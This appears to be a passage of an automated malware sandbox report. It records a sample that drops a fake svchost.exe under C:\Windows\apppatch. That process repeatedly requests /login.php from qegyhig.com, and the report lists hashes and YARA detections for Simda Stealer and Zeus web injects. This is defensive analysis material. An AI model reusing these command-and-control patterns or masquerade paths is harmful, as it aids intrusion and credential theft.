                                                                                                                                                                                                            2024-11-11 17:25:31 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                            Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.1062050188.114.96.34437908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC945INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:31 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tWGvUWrHSqfbbgsWEl%2BGkY0QEjgyi7VA5B4jGXL3Ppw4ZV7Fivf0bRuvu4UtiRYRYIppUy79ePPjSaQEzGJ%2F0vj%2Bp0bNuTkEWjZQnBfmIAH74XFr2pnXk1MV6zwhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb65b9af5391-DEN
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=46905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=61831&cwnd=32&unsent_bytes=0&cid=8340e877fedd24c3&ts=709&x=0"
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC424INData Raw: 37 63 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7caa<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                                                                                                                                            Data Ascii: <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74
                                                                                                                                                                                                            Data Ascii: (e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.widt
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28
                                                                                                                                                                                                            Data Ascii: ypeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e
                                                                                                                                                                                                            Data Ascii: emoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68
                                                                                                                                                                                                            Data Ascii: cription{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weigh
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c
                                                                                                                                                                                                            Data Ascii: it-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{col
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65
                                                                                                                                                                                                            Data Ascii: uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-conte
                                                                                                                                                                                                            2024-11-11 17:25:31 UTC1369INData Raw: 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73
                                                                                                                                                                                                            Data Ascii: oocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="pas


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.1062051188.114.96.34437908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:25:32 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:25:33 UTC956INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:33 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk3mjjcLLNogo8n%2FO1NZ%2FzJH5m4jAys249E2LCauldADu%2FvW%2FcQTr%2BHNWp2PXJMY0JniZZsWuAK8mXNLH1Cv%2BK5gUiz5USEVlS5aBVev%2FgLNrC1PE4iDxizaupLXug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb704e748c57-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=5ce8563c57c430c1&ts=1019&x=0"
                                                                                                                                                                                                            2024-11-11 17:25:33 UTC413INData Raw: 37 63 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7ca2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-11-11 17:25:33 UTC1369INData Raw: 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65
                                                                                                                                                                                                            Data Ascii: }</style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><me
                                                                                                                                                                                                            2024-11-11 17:25:33 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e
                                                                                                                                                                                                            Data Ascii: ;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:12:24:23
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Z8eHwAvqAh.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:3AB620205ABE34E0BB0A34C253B30CD7
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:12:24:25
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:3544C1362497D11F8724B63036038086
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2140868615.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2143770562.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2147781586.0000000002700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2140232259.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2117066204.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2059054571.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
